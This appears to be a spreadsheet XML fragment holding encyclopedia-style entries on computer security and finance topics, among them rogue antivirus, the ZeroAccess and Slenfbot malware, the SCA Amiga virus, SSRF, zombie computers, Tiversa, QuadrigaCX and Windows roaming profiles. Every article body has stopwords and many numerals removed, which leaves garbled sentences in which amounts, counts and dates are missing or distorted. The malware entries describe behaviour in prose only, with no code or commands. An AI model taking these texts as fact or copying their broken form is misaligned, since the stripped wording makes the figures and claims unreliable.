  </si>
  <si>
    <t>Rogue security software</t>
  </si>
  <si>
    <t>rogue security software form malicious software internet fraud misleads users believing virus computer aims convince fake malware removal tool actually installs malware computer. form scareware manipulates users fear, form ransomware. rogue security software serious security threat desktop computing since 2008. early example gained infamy spysheriff clones. propagation rogue security software mainly relies social engineering (fraud) defeat security built modern operating system browser software install onto victims' computers. website may, example, display fictitious warning dialog stating someone's machine infected computer virus, encourage manipulation install purchase scareware belief purchasing genuine antivirus software. most trojan horse component, users misled installing. trojan disguised browser plug-in extension (typically toolbar) image, screensaver archive file attached e-mail message multimedia codec required play certain video clip software shared peer-to-peer networks free online malware-scanning servicesome rogue security software, however, propagate onto users' computers drive-by downloads exploit security vulnerabilities browsers, viewers, email clients install without manual interaction.more recently, malware distributors utilizing poisoning techniques pushing infected urls search engine results recent news events. people looking articles events search engine encounter results that, upon clicked, instead redirected series sites arriving landing page says machine infected pushes download "trial" rogue program. 2010 study google found 11,000 domains hosting fake anti-virus software, accounting malware delivered internet advertising.cold-calling also become vector distribution type malware, callers often claiming "microsoft support" another legitimate organization. common infection vectors black black search engine optimization (seo) technique used trick search engines displaying malicious urls search results. malicious webpages filled popular keywords order achieve higher ranking search results. when user searches web, infected webpages returned. usually popular keywords services google trends used generate webpages scripts placed compromised website. these scripts monitor search engine crawlers feed specially crafted webpages listed search results. then, user searches keyword images clicks malicious link, redirected rogue security software payload. malvertising most websites usually employ third-party services advertising webpages. advertising services compromised, inadvertently infecting websites using service advertising rogue security software. spam campaigns spam messages include malicious attachments, links binaries drive-by download sites another common mechanism distributing rogue security software. spam emails often sent content associated typical day-to-day activities parcel deliveries, taxation documents, designed entice users click links attachments. when users succumb kinds social engineering tricks quickly infected either directly attachment, indirectly malicious website. this known drive-by download. usually drive-by download attacks malware installed victim's machine without interaction awareness occurs simply visiting website. operation once installed, rogue security software attempt entice user purchasing service additional software alerting user fake simulated detection malware pornography. displaying animation simulating system crash reboot. selectively disabling parts system prevent user uninstalling malware. some also prevent anti-malware programs running, disable automatic system software updates block access websites anti-malware vendors. installing actual malware onto computer, alerting user "detecting" them. this method less common malware likely detected legitimate anti-malware programs. altering system registries security settings, "alerting" user.developers rogue security software also entice people purchasing product claiming give portion sales charitable cause. rogue green antivirus, example, claims donate environmental care program sale made. some rogue security software overlaps function scareware also: presenting offers urgent performance problems perform essential housekeeping computer. scaring user presenting authentic-looking pop-up warnings security alerts, mimic actual system notices. these intended trust user vendors legitimate security software.sanction increasing effectiveness anti-malware tools since 2006 made difficult spyware adware distribution networks—already complex begin with—to operate profitably. malware vendors turned instead simpler, profitable business model rogue security software, targeted directly users desktop computers.rogue security software often distributed highly lucrative affiliate networks, affiliates supplied trojan kits software paid every successful installation, commission resulting purchases. affiliates become responsible setting infection vectors distribution infrastructure software. investigation security researchers antivirus 2008 rogue security software found affiliate network, members grossing commissions upwards $usd150,000 days, tens thousands successful installations. countermeasures private efforts enforcement legislation countries slow react appearance rogue security software. contrast, several private initiatives providing discussion forums lists dangerous products founded soon appearance first rogue security software. some reputable vendors, kaspersky, also began provide lists rogue security software. 2005, anti-spyware coalition founded, coalition anti-spyware software companies, academics, consumer groups. many private initiatives initially informal discussions general internet forums, started even entirely carried individual people. perhaps famous extensive spyware warrior list rogue/suspect antispyware products websites eric howes, however updated since 2007. website recommends checking following websites rogue anti-spyware programs, really "simply re-branded clones knockoffs rogue applications around years." government efforts december 2008, district court maryland—at request ftc—issued restraining order innovative marketing inc, kyiv-based firm producing marketing rogue security software products winfixer, winantivirus, drivecleaner, errorsafe, antivirus. company us-based host, bytehosting internet hosting services llc, assets frozen, barred using domain names associated products advertisement false representation.law enforcement also exerted pressure banks shut merchant gateways involved processing rogue security software purchases. cases, high volume credit card chargebacks generated purchases also prompted processors take action rogue security software vendors. also anti-virus list rogue security software scareware technical support scam winwebsec notes references external links media related rogue software wikimedia commons</t>
  </si>
  <si>
    <t>Prolok</t>
  </si>
  <si>
    <t>prolok copy protection system developed krag brotby vault corporation 1982. prolok involved copyright case vault corp. quaid software ltd. allowed software used certain situations copyright holder originally intend. prolok developed apple cp/m, cp/m-86, ms-dos, microsoft windows os/2. patent 4,785,361 references</t>
  </si>
  <si>
    <t>ShapeShift</t>
  </si>
  <si>
    <t>shapeshift cryptocurrency exchange. headquartered switzerland, denver.the company first began requiring personal identification information customers october 2018. history company founded july 2014 switzerland erik voorhees. cites collapse exchange impetus creation shapeshift, demonstrated need create method exchange customer funds held custody third-party. march 2015, company received us$525,000 seed-stage investment roger barry silbert. additional funding totaling us$1.6 million raised september 2015, investors second funding round including digital currency group, bitfinex, bitcoin capital mardal investments.shapeshift released initially platform june 2015, allowing users swap digital currencies value tokens. september 2015, different digital currencies available trade, providing trading pairs, greater single exchange market. june 2015, shapeshift "cut service york response state’s regulatory policy digital currency businesses, bitlicense," released june final regulations approved august. company stated complied york bitlicense regulations, significant personal private data would also hands hacker. between march april 2016, shapeshift experienced total attacks resulted btc, 1900 5800 stolen wallets. result, shapeshift team shapeshift.io offline april rebuild shapeshift's infrastructure enhanced security protocols. march 2017, shapeshift raised $10.4 million series funding international venture capital firms. berlin-based earlybird venture capital lead investor, additional funding lakestar, access venture partners, pantera capital blockchain capital.in august 2017 shapeshift announced would stop functioning state washington bitlicense-style regulations imposed passage senate bill 5031. 2018 investigation wall street journal found shapeshift processed million funds criminal activities two-year period. references</t>
  </si>
  <si>
    <t>ZeroAccess botnet</t>
  </si>
  <si>
    <t>zeroaccess trojan horse computer malware affects microsoft windows operating systems. used download malware infected machine botnet remaining hidden using rootkit techniques. history propagation zeroaccess botnet discovered least around 2011. zeroaccess rootkit responsible botnet's spread estimated present least million systems. estimates botnet size vary across sources; antivirus vendor sophos estimated botnet size around million active infected machines third quarter 2012, security firm kindsight estimated million infected active systems.the spread zeroaccess rootkit variety attack vectors. attack vector form social engineering, user persuaded execute malicious code either disguising legitimate file, including hidden additional payload executable announces example, bypassing copyright protection keygen). second attack vector utilizes advertising network order user click advertisement redirects site hosting malicious software itself. finally, third infection vector used affiliate scheme third-party persons paid installing rootkit system.in december 2013 coalition microsoft moved destroy command control network botnet. attack ineffective though seized, peer-to-peer command control component unaffected meaning botnet could still updated will. operation once system infected zeroaccess rootkit start main botnet operations: bitcoin mining click fraud. machines involved bitcoin mining generate bitcoins controller, estimated worth million dollars year september 2012. machines used click fraud simulate clicks website advertisements paid click basis. estimated profit activity high 100,000 dollars day, costing advertisers $900,000 fraudulent clicks. typically, zeroaccess infects master boot record (mbr) infected machine. alternatively infect random driver c:\windows\system32\drivers giving total control operating system. also disables windows security center, firewall, windows defender operating system. zeroaccess also hooks tcp/ip stack help click fraud. software also looks tidserv malware removes finds also botnet malware command control (malware) zombie (computer science) internet crime internet security click fraud clickbot.a references external links analysis zeroaccess botnet, created sophos. zeroaccess botnet, kindsight security labs. protocol zeroaccess, kindsight security labs.</t>
  </si>
  <si>
    <t>SCA (computer virus)</t>
  </si>
  <si>
    <t>virus first computer virus created commodore amiga first gain public notoriety. appeared november 1987. virus boot sector virus. features line text appears every 15th copy warm reboot: something wonderful happened your amiga alive and, even better... some disks infected virus another masterpiece mega-mighty "sca" acronym swiss cracking association, group engaged software protection removal, geographic origin virus switzerland. virus probably authored member known "chris". harm disks spreads write-enabled floppies inserted. custom bootblocks (such games), rendered unusable. also checksums original filesystem (ofs) bootblock, hence destroying newer filesystems user know proper "install" command remove ("install df0: force" recover 'fast filesystem' floppy). "mega-mighty sca" produced first amiga virus checker killed virus. this well response estimates approximately amiga users disk collection somewhere, rampant piracy. other authors inspired harmless virus would later produce destructive viruses known byte bandit byte warrior. first line infection message refers 1986 movie short circuit subsequent computer game line "something wonderful happened... alive." references mark brown (january 1988). "virus!". info (18). info magazine description virus external links swiss cracking association's homepage virus entry amiga archive virus test center sca-virus description virus help team, amiga virus encyclopedia sca-virus description defunct amiga virus encyclopedia swiss cracking association archive, part part part "got papers?" historical research project</t>
  </si>
  <si>
    <t>Server-side request forgery</t>
  </si>
  <si>
    <t>computer security, server-side request forgery (ssrf) type exploit attacker abuses functionality server causing access manipulate information realm server would otherwise directly accessible attacker.similar cross-site request forgery utilises client, example, browser, within domain proxy attacks; ssrf attack utilizes insecure server within domain proxy. parameter vulnerable attack, possible attacker devise ways interact server directly (ie: 127.0.0.1 localhost) backend servers accessible external users. attacker practically scan entire network retrieve sensitive information. types ssrf basic ssrf: type attack response displayed attacker. server fetches requested attacker sends response back attacker. blind ssrf: type attack response sent back attacker. therefore, attacker devise ways confirm vulnerability. references</t>
  </si>
  <si>
    <t>Slenfbot</t>
  </si>
  <si>
    <t>slenfbot classification family malicious software (malware), infects files microsoft windows systems. slenfbot first discovered 2007 and, since then, numerous variants followed; slightly different characteristics additions worm's payload, ability provide attacker unauthorized access compromised host. slenfbot primarily spreads luring users follow links websites, contain malicious payload. slenfbot propagates instant messaging applications, removable drives and/or local network network shares. code slenfbot appears closely managed, provide attribution single group and/or indicate large portion code shared amongst multiple groups. inclusion malware families variants well continuous evolution, makes slenfbot highly effective downloader propensity cause even damage compromised systems. aliases majority antivirus (a/v) vendors following naming conventions referring family malware (the names wildcard possible classifications and/or distinctions malware family): slenfbot stekct publicly known efforts none publicly known. malware profile summary slenfbot worm spreads using links websites containing malicious software (malware) instant messaging programs, include msn/windows live messenger, instant messenger (aim), yahoo messenger, google chat, facebook chat, skype. worm propagates automatically removable drives shares, local network windows file sharing service (i.e., server lanmanserver service). slenfbot also contains backdoor capabilities allow unauthorized access affected machine. code appears closely controlled, provide attribution group and/or malware authors share significant portion code. slenfbot seen wild since 2007, obtained features capabilities time, subsequent variants systematically gained similar, same, feature sets. because this, slenfbot continues operate effective infector dynamic downloader additional malware; thus, making highly functional delivery mechanism spyware, information stealers, spam bots well malware. installation when executed, slenfbot copies duplicate malicious payload %system% folder filename, varies particular variant sets attributes copy read only, hidden system hide contents windows explorer. worm makes changes registry maintain persistence malware executes duplicate copy subsequent startup system (e.g. copying malicious executable hklm\software\microsoft\windows\currentversion\run subkey). several variants modify registry installation malware list applications authorized access internet; thus, allowing malware communicate without raising windows security alerts unimpeded windows firewall.in cases, variants instead modify registry install malicious payload debugger benign system file ctfmon.exe ctfmon.exe executes system startup, leads execution malware.in cases, slenfbot attempt delete original copy worm. some variants make additional modifications registry order delete originally executed copy worm system restarts.some slenfbot variants may, initial execution, test msn/windows live messenger currently running looking window class name "msblwindowclass". worm finds window, malware display fake error message.if slenfbot launched removable drive, variants open windows explorer display contents affected drive. certain slenfbot variants inject thread explorer.exe, periodically checks presence malware system folder. file found, malware downloads copy specified server launches copy. method propagation instant messaging slenfbot uses instant messaging attack vector spread worm accounts contacts. remote attacker worm’s backdoor capabilities instruct slenfbot spread msn/windows live messenger, instant messenger (aim), yahoo messenger, google chat, facebook chat, skype. worm connects remote server sends copy url, contains list possible messages send randomly; creates archive, contains copy malware; sends archive instant messaging client contacts. following examples messages worm spread: serious...is really you? haha! funny! here, read guys shirt. really you? omfg look this!!! this dream right here! file includes file name slenfbot executable, also contain file download situations attacker instructs worm send arbitrary file(s). removable drives slenfbot spread removable drives creating directory called “recycler” root directory removable drive. malware create subdirectory “recycler” folder (e.g. “s-1-6-21-1257894210-1075856346-012573477-2315”), copy malicious payload directory using different name executable (e.g. “folderopen.exe”). slenfbot also create autorun.inf file root directory drive worm execute drive connected another system.certain variants download updated copy slenfbot location specified worm, write file directory (e.g. using name “~secure”). locations worm copies slenfbot sets hidden system attributes respective directories files. circumstances programming issue, slenfbot create directory rather (e.g. “e:\recyclers-1-6-21-1257894210-1075856346-012573477-2315\folderopen.exe”). file print shares slenfbot spread accessible shares upon successful compromise system. worm also spread file print shares exploiting known vulnerabilities ms06-040 ms10-061, pertain issues server print spooler services, respectively. attacker would instruct worm spread remote system exploit instant messaging order continue propagation slenfbot. payload slenfbot attempts connect internet relay chat (irc) server particular port (the channel port number vary variant), joins channel waits commands; attacker backdoor perform additional actions compromised system delete malware, join another channel, download/execute arbitrary files and/or propagate instant messaging accounts slenfbot makes modifications hosts file replacing %system%\drivers\etc.\hosts file own; modified host file contain several entries point various anti-virus security related domains localhost (i.e. 127.0.0.1) random address, obstruct user visiting list domains; file also contain numerous blank lines give appearance hosts file modified slenfbot runs commands delete files named *.zip *.com current directory well user's "received files" directory, default location windows messenger stores downloaded files; latter delete original copy worm, received windows messenger some slenfbot variants create file (e.g. "removemexxxx.bat") %temp% directory, batch file tries delete copy execution prevent detection slenfbot deletes various registry keys subkeys values contain order disable system restore, task manager, windows registry editor and/or prevent viewing files hidden attributes; worm also disable antivirus, firewall well attempt disable data execution prevention (dep) making modifications system; variants periodically rewrite changes order maintain persistence system slenfbot terminate security-related processes well stop, disable delete services compromised system order remain undetected maintain persistence slenfbot inject code explorer process "lock" file order prevent worm deleted and/or reopen payload upon process termination slenfbot also capable hiding malicious process task manager slenfbot variants create mutex differs according variant slenfbot execute additional commands receiving data another remote system; commands include additional instructions modify compromised system slenfbot download install additional malware relay spam, steal information, install spyware toolbars well propagate malicious campaigns; initial slenfbot payload serves first-stage downloader purpose loading additional malware compromised host prevention following steps help prevent infection: latest computer updates installed software up-to-date antivirus software limit user privileges computer have sender confirm sent link clicking caution clicking links webpages caution opening attachments accepting file transfers online services analyze files urls (e.g. malwr, virustotal, anubis, wepawet, etc.) only software publishers trust protect social engineering attacks strong passwords change passwords periodically recovery slenfbot uses stealth measures maintain persistence system; thus, need boot trusted environment order remove slenfbot also make changes computer changes windows registry, makes difficult download, install and/or update virus protection. also, since many variants slenfbot attempt propagate available removable/remote drives network shares, important ensure recovery process thoroughly detects removes malware known/possible locations. possible solution would microsoft’s windows defender offline beta detect remove slenfbot system. information windows defender offline, http://windows.microsoft.com/en-us/windows/what-is-windows-defender-offline also computer virus botnet references</t>
  </si>
  <si>
    <t>Zombie (computing)</t>
  </si>
  <si>
    <t>computing, zombie computer connected internet compromised hacker computer virus, computer worm, trojan horse program used perform malicious tasks remote direction hacker. zombie computers often coordinate together botnet controlled hacker, used activities spreading e-mail spam launching distributed denial-of-service attacks (ddos attacks) servers. most victims unaware computers become zombies. concept similar zombie haitian voodoo folklore, refers corpse resurrected sorcerer magic enslaved sorcerer's commands, free own. coordinated ddos attack multiple botnet machines also resembles "zombie horde attack", depicted fictional zombie films. advertising zombie computers used extensively send e-mail spam; 2005, estimated 50–80% spam worldwide sent zombie computers. this allows spammers avoid detection presumably reduces bandwidth costs, since owners zombies bandwidth. this spam also greatly increases spread trojan horses, trojans self-replicating. they rely movement e-mails spam grow, whereas worms spread means. similar reasons, zombies also used commit click fraud sites displaying pay-per-click advertising. others host phishing money mule recruiting websites. distributed denial-of-service attacks zombies used conduct distributed denial-of-service (ddos) attacks, term refers orchestrated flooding target websites large numbers computers once. large number internet users making simultaneous requests website's server intended result crashing prevention legitimate users accessing site. variant type flooding known distributed degradation-of-service. committed "pulsing" zombies, distributed degradation-of-service moderated periodical flooding websites intended slow rather crash victim site. effectiveness tactic springs fact intense flooding quickly detected remedied, pulsing zombie attacks resulting slow-down website access unnoticed months even years.the computing facilitated internet things (iot) productive modern usage played significant role increase attacks. potential enables every device communicate efficiently increases need policy enforcement regarding security threats. through devices, prominent attacking behaviors ddos. research conducted study impact attacks networks compensating provisions defense.notable incidents distributed denial- degradation-of-service attacks past include attack upon spews service 2003, blue frog service 2006. 2000, several prominent sites (yahoo, ebay, etc.) clogged standstill distributed denial service attack mounted ‘mafiaboy’, canadian teenager. smartphones beginning july 2009, similar botnet capabilities also emerged growing smartphone market. examples include july 2009 "wild" release sexy space text message worm, world's first botnet capable worm, targeted symbian operating system nokia smartphones. later month, researcher charlie miller revealed proof concept text message worm iphone black briefings. also july, united arab emirates consumers targeted etisalat blackberry spyware program. 2010s, security community divided real world potential mobile botnets. august 2009 interview york times, cyber security consultant michael gregg summarized issue way: point [smart]phones desktops '80s." also bashlite botnet denial-of-service attack orbit cannon malware shop trojan horse (computing) references external links botnet operation controlled million your zombie? about.com intrusive analysis web-based proxy zombie network detailed account zombie machine looks like takes "fix" correspondence steve gibson wicked zombie networks, comment spam, referer [sic] spam york times: phone hacking threat low, exists hackers target cell phones, wplg-tv/abc-10 miami researcher: blackberry spyware wasn’t ready prime time forbes: hijack every iphone world hackers plan clobber cloud, blackberries smobile systems release solution etisalat blackberry spyware loic irc-0 open-source botnet network stress testing open-source webpage botnet network stress testing</t>
  </si>
  <si>
    <t>Tiversa</t>
  </si>
  <si>
    <t>tiversa american cybersecurity firm headquartered pittsburgh, pennsylvania. founded retired chiropractor real estate entrepreneur named robert boback 2004. company specialized trawling deep web, investigating peer-to-peer networks, helping businesses counteract data breaches cybersecurity risks. main product eaglevision piece software monitored deep parts internet easily accessible general browsers, peer-to-peer networks sensitive data. history before entering cybersecurity field, boback chiropractor real estate entrepreneur. started tiversa 2004 two-person shop. tiversa quickly obtained high-profile board advisers, including maynard webb (former ebay executive chairman yahoo), howard schmidt (obama-era cybersecurity chief), wesley clark (former supreme allied commander nato). marine hack 2009, tiversa claimed discovered major security breach involving then-president barack obama's helicopter, marine one. breach involved leak iran sensitive procurement information helicopter well helicopter's blueprints. according tiversa's ceo, breach caused defense contractor employee whose daughter downloaded peer-to-peer file-sharing client onto disused laptop contained sensitive materials. this discovery made national news, whistleblower later claimed iranian hack actually fabricated tiversa employees. boback, tiversa, denied allegation. labmd scandal 2008, tiversa executive contacted labmd urology testing laboratory) claiming discovered evidence major data breach offered sell labmd monitoring services counteract breach. when head labmd declined purchase monitoring services, tiversa allegedly leaked information breach u.s. federal trade commission, pursues cybersecurity issues. launched probe labmd's practices section federal trade commission 2010, evolved formal administrative complaint 2013. labmd's revenues fell business collapsed 2014 clients declined renewal contracts partners ended agreements. however, november 2014, administrative judge threw complaint labmd, citing lack reliability evidence provided tiversa ftc. this stemmed whistleblower complaint former tiversa employee, richard wallace, claimed breached labmd's systems labmd's data never leaked outside network. also alleged tiversa responsible complaint labmd, made retaliation labmd's refusal purchase tiversa's monitoring services. sworn testimony, wallace admitted fabricating data instill fear breaches "probably every company we've ever done business with". federal probe following wallace's whistleblower complaint, federal government began probing tiversa allegations deliberately provided false information data breaches retaliate companies declined purchase data protection services. department justice launched criminal investigation 2015 following whistleblower complaint also launched probe whether tiversa lied among companies reported them. acquisition kroll inc. june 2017, tiversa acquired kroll inc. employees hired maintain tiversa investigation systems. january 2019, system still operational person england reported twitter: "care tell snooping i.p. address?" prominent clients capital lehman brothers goldman sachs american express references external links official website wayback machine (archived april 2018)</t>
  </si>
  <si>
    <t>Quadriga Fintech Solutions</t>
  </si>
  <si>
    <t>quadriga fintech solutions owner operator quadrigacx, believed canada's largest cryptocurrency exchange. 2019 exchange ceased operations company filed bankruptcy c$215.7 million liabilities c$28 million assets.the company's founder, gerald william cotten, died 2018 traveling india. c$250 million (us$190 million) cryptocurrency owed 115,000 customers missing could accessed cotten held password off-line cold wallets.quadriga likely never invested funds entrusted according chainalysis, cryptocurrency tracking firm. either funds never received quickly went missing. "what quadriga really money customers gave bitcoin remains mystery," according chainalysis.ernst young appointed independent monitor quadriga granted temporary legal protection creditors companies' creditors arrangement act. april 2019 firm entered bankruptcy bankruptcy insolvency possibility successful reorganization appeared remote.the royal canadian mounted police (rcmp) u.s. federal bureau investigation (fbi) reportedly investigating company. lawyers customers exchange asked cotten's body exhumed. history founding gerald cotten (born 1988) lived belleville, ontario attending schulich school business york university toronto. graduated york bachelor business administration 2010. learned bitcoin toronto travelled vancouver, british columbia, founded quadriga november 2013 michael patryn. quadriga started local trades. their online exchange launched first month. january 2014 installed second bitcoin vancouver. 2014 c$7.4-million worth bitcoin exchanged quadriga. 2014 interview, founder gerald cotten explained company stored customer funds paper wallets safe deposit boxes: send money them, don’t need back bank every time want money send money bitcoin directly paper wallets, keep safe way."the company tried raise money list canadian securities exchange (cse) working patryn. company raised c$850,000 cancelled plans list exchange early 2016. quadriga four employees 2015 offices vancouver toronto, money june 2015.in 2016, cotten became sole director quadriga directors resigned. other contractors, employees, offices bank accounts thereafter.in 2017, bitcoin experienced speculative frenzy rising price us$1,000 almost us$20,000. about c$1.2-billion worth bitcoin exchanged quadriga. while large increase volume increased commissions, also caused cash-flow problems exchange's reliance external payment processors lack proper accounting system. june 2017, quadriga announced lost ethereum worth us$14 million smart contract error.throughout 2018, bitcoin prices crashed, customers exchange reported delays attempting withdraw dollars. c$28 million held costodian, quadriga payment processor, frozen canadian imperial bank commerce (cibc) january 2018. cibc stated could determine ownership money could contact cotten quadriga. november 2018 case decided accounts going court decide ownership individually. neither costodian quadriga could access funds.according court filings, quadriga also used wb21 payment processor. michael gastauer, chief executive wb21, named civil lawsuit u.s. securities exchange commission part us$165 million fraud. another payment processor used quadriga, crypto capital, named civil suit filed york attorney general april 2019. case, $851 million entrusted crypto capital "lost, stolen absconded with", according suit.quadriga used unusual teller-window system customers withdraw money. rather customers bank wires, told come nondescript building laval, quebec pick cash. customers reported arrived, nobody office, cash disbursed.in january 2019 ernst young reported quadriga bank account, instead used third-party payment processors. apparently formal accounting system. business cotten's encrypted laptop cotten's home fall river, nova scotia. omar dhanani quadriga co-founder michael patryn identified globe mail omar dhanani, convicted identity theft charges u.s. served months federal prison. dhanani also pleaded guilty burglary grand theft charges deported canada. bloomberg also identified patryn dhanani, showing officially changed name omar dhanani omar patryn british columbia march 2003 changed michael patryn october 2008. ceo's death according jennifer robertson, cotten's widow, died december 2018 travelling india. accompanied hospital jaipur previous diagnosed septic shock, perforation, peritonitis, intestinal obstruction. 9th, allegedly died episodes cardiac arrest. december, death certificate issued local municipality well objection certificate" police return body nova scotia.robertson filed affidavit behalf company included "statement death" cotten, filed halifax, nova scotia, december 2018. also stated quadriga 363,000 registered users c$250 million owed 115,000 affected users.cotten's signed november 2018, twelve days allegedly died. left robertson entire c$9.6-million estate named trustee. estate includes airplane, sailboat, 2017 lexus, real estate nova scotia kelowna, british columbia. c$100,000 trust fund made provide lifelong care cotten's chihuahuas case robertson's death.on january 2019, quadriga announced ceo, gerald cotten, died month prior crohn's disease volunteer work orphanage india. after exchange maintenance mode several days january, announced 31st applying creditor protection. according affidavit ceo's widow, approximately 115,000 customers owed c$250 million (us$190 million), cryptocurrency held quadriga's cold wallet laptop deceased access blockchain analysts reported unable find evidence quadriga's cold wallets blockchain, public ledger used cryptocurrencies.ernst young found five quadriga cold wallet addresses, empty, containing cryptocurrency since april 2018. another "appears used receive bitcoin another cryptocurrency exchange account subsequently transfer bitcoin quadriga wallet" december. another three empty wallets believed possibly owned quadriga. fourteen trading accounts also examined used trade exchanges.quadriga continued accept deposits january. ponzi scheme some reddit users suggested cotten faked death order defraud customers exit scam, others believe cotten's death exposed ponzi scheme. december 2019, court-appointed firm representing exchange's former users sent letter rcmp asking exhume cotten's body confirm identity verify cause death.in june 2020, ontario securities commission officially concluded quadriga indeed fraud ponzi scheme. stated gerald cotten committed fraud opening accounts aliases crediting fictitious currency crypto asset balances, traded unsuspecting clients "what happened quadriga old-fashioned fraud wrapped modern technology." official ontario securities report quadriga attached here.gerald cotten's widow maintained knew nothing husband's activities agreed forfeit million assets. insolvency proceedings february, 2019, nova scotia supreme court justice michael wood ordered "30-day stay precludes filing claims quadriga", temporary legal protection creditors companies' creditors arrangement act, legal status allows insolvent corporations restructure business financial affairs. meanwhile, order manage finances company process, third-party monitor, ernst young, appointed. aaron matthews served director operations.ernst young reported february 2019 c$468,675 (us$354,300) bitcoin "inadvertently" sent inaccessible cold wallet.on march 2019, justice wood extended quadriga's court protection april. appointed peter wedlake grant thornton chief restructuring officer. quadriga's customers owed c$260 million cryptocurrency cash. c$24.7 million disbursement fund planned c$300,000 cotten's widow, jennifer robertson, advanced amount start court proceedings; c$200,000 ernst young another c$250,000 lawyers; c$229,842 quadriga's lawyers; c$17,000 independent contractors.quadriga's lawyer, firm stewart mckelvey, withdrew case potential conflict interest. popular media documentary titled dead man's switch: crypto mystery story gerald cotten premiered 2021 docs canadian international documentary festival.the released 6-episode podcast quadriga death founder called death cryptoland. podcast hosted takara small.a netflix documentary titled trust one: hunt crypto king story gerald cotten released march 2022. references further reading "more $400,000 quadrigacx cryptocurrency disappears 'cold wallet'". news. canadian press. february 2019. retrieved february 2019. gerard, david february 2019). "forget bitcoin, your mattress". foreign policy. retrieved february 2019. castaldo, joe; posadzki, alexandra november 2019). "before quadriga: shady ventures gerald cotten's youth creation ill-fated cryptocurrency exchange". globe mail. retrieved december 2019. external links exchange website</t>
  </si>
  <si>
    <t>Token Binding</t>
  </si>
  <si>
    <t>token binding proposed standard transport layer security (tls) extension aims increase security using cryptographic certificates ends connection. current practice often depends bearer tokens, lost stolen. bearer tokens also vulnerable man-in-the-middle attacks replay attacks. contrast, bound tokens established user agent generates private-public pair target server, providing public server, thereafter proving possession corresponding private every connection server. token binding evolution transport layer security channel (previously known transport layer security origin bound certificates (tls-obc)) extension. industry participation widespread standards contributors including microsoft, google, paypal, ping identity, yubico. browser support remains limited, however. only versions microsoft edge using edgehtml engine support token binding. ietf standards following group ietf rfcs internet drafts comprise interrelated specifications implementing different aspects token binding standard. token binding protocol version 1.0. allows client/server applications create long-lived, uniquely identifiable bindings spanning multiple sessions connections. applications enabled cryptographically bind security tokens layer, preventing token export replay attacks. protect privacy, token binding identifiers conveyed reset user time. transport layer security (tls) extension token binding protocol negotiation. extension negotiation token binding protocol version parameters. token binding http. collection mechanisms allow http servers cryptographically bind security tokens (such cookies oauth tokens) connections. token binding transport layer security (tls) version connections. this companion document defines backwards compatible negotiate token binding connections. https token binding terminating reverse proxies. defines http header fields enable terminating reverse proxy convey information backend server validated token binding message received client, enables backend server bind, verify binding cookies security tokens client's token binding key. this facilitates reverse proxy backend server functioning together though single logical server side deployment https token binding.related ietf draft standard: oauth token binding. enables oauth implementations apply token binding access tokens, authorization codes, refresh tokens, authorization grants, client authentication. this cryptographically binds tokens client's token binding pair, possession proven connections tokens intended used. this token binding protects tokens man-in-the-middle token export replay attacks. related standards token binding allows robust authentication. several authentication standards developed standards bodies outside ietf adopting draft standards. draft openid connect token bound authentication 1.0. openid connect (oidc) simple identity layer oauth protocol. oidc enables clients verify identity end-user based authentication performed authorization server, well obtain basic profile information end-user interoperable, rest-like manner. oidc token bound authentication specification enables oidc implementations apply token binding oidc token. this cryptographically binds token connection authentication occurred. this token binding protects authentication flow man-in-the-middle token export replay attacks. proposed recommendation authentication: accessing public credentials. authentication (webauthn), interface public-key authentication users web-based applications services, supports token binding. references external links token binding browserauth.net token binding presentation identiverse 2018 klingenstein, nate; scavo, (august 2010). "saml v2.0 holder-of-key browser profile". oasis. retrieved august 2018. oauth token binding blog</t>
  </si>
  <si>
    <t>Roaming user profile</t>
  </si>
  <si>
    <t>roaming user profile file synchronization concept windows family operating systems allows users computer joined windows domain computer domain access documents consistent desktop experience, applications remembering toolbar positions preferences, desktop appearance staying same, keeping related files stored locally, continuously depend fast reliable network connection file server. method operation windows operating systems since windows designed support roaming profiles. normally, standalone computer stores user's documents, desktop items, application preferences, desktop appearance local computer divided sections, consisting portion could roam plus additional temporary portion containing items browser cache. windows registry similarly divided support roaming; system local machine hives stay local computer, plus separate user hive (hkey_current_user) designed able roam user profile. when roaming user created, user's profile information instead stored centralized file server accessible network-joined desktop computer. login prompt local computer checks user exists domain rather local computer; pre-existing account required local computer. domain login successful, roaming profile copied central file server desktop computer, local account created user. when user logs desktop computer, user's roaming profile merged local computer back central file server, including temporary local profile items. because merge move/delete, user's profile information remains local computer addition merged network. when user logs second desktop computer, process repeats, merging roaming profile server second desktop computer, merging back desktop server user logs off. when user returns first desktop computer logs roaming profile merged previous profile information, replacing profile caching enabled, server capable merging newest files local computer, reusing existing local files changed since last login, thereby speeding login process. limitations performance profile copying login logout, roaming profile using default configuration extremely slow waste considerable amounts time users large amounts data account. when microsoft designed internet explorer, programmers made explicit decision store cookies favorites tiny individual files less kilobyte each, rather storing data single large consolidated file. microsoft also stores shortcut files recent profile folder, linking recently opened files folders. file servers tend transfer large files several megabytes size fastest possible network speed. hundreds small files kilobyte file reduce network performance 90%. profile ages accumulates hundreds thousands cookies, favorites, recent items, login logout times become progressively slower, even though files occupy megabytes profile data. local caching user profile desktop computer hard drive reduce improve login logout times, penalty cluttering hard drive profile data every cached user logs local caching suitable people tend computer every day. local profile caching useful hundreds thousands students need able computer across school university campus—the cumulative cached data many different profiles consume available computer disk space. links users roaming profile encounter crippling logon delays logging wan. connected domain remote site, authentication, windows attempt pull user's profile location specified active directory. location happens across link potentially slow crawl cause logon fail (after lengthy delay). users roaming profile working remote site login machine connecting network, machine uses cached local copy) connect network logon completed. another option remove roaming profile path active directory prior departure. this must done enough time change replicated relevant domain controller remote site. profile size working large files, editing videos, cause excessive login logout times, windows copy files roaming profile computer login back server logout. environments large files mission-critical absolutely need backed server per-login basis, applications requiring excessively large amounts user data instead usually stand-alone local account roam, bypass network storage retrieval problems. network congestion school environment, roaming result severe network congestion slowness entire classroom students computers time, within minutes attempting somewhere else. inconsistency account data result students begin second location profile uploading first location finished. misbehaving programs exit some programs installed desktop computers properly release control user registry logoff, result corrupted profiles user registry copying never successfully completes. deal this, microsoft created utility known user profile hive cleanup service forcibly remap file handles misbehaving programs profile copying finish successfully account logoff successful. however, hung program remain local computer still holding local cached copy user registry busy state, computer rebooted. synchronization logoff recent version file roaming profile without redirection stored local computer, stays user logs off, whereupon transfers server. nightly server backups done, roaming user days time, roaming account documents included nightly backup. further, roaming user uses standby hibernation turn computer night, profile still copied network. manner possible roaming account's documents backed days weeks time, potential considerable data loss local hard drive suffers catastrophic failure long periods logging roaming account local computer. access conflict underlying file copying mechanism server desktop, roaming assumes user account logged single computer time. documents roaming profile copied local machine network awareness other, possible file locking alert user file already open. logging onto multiple computers account, opening document multiple times computer result inconsistencies loss saved changes file 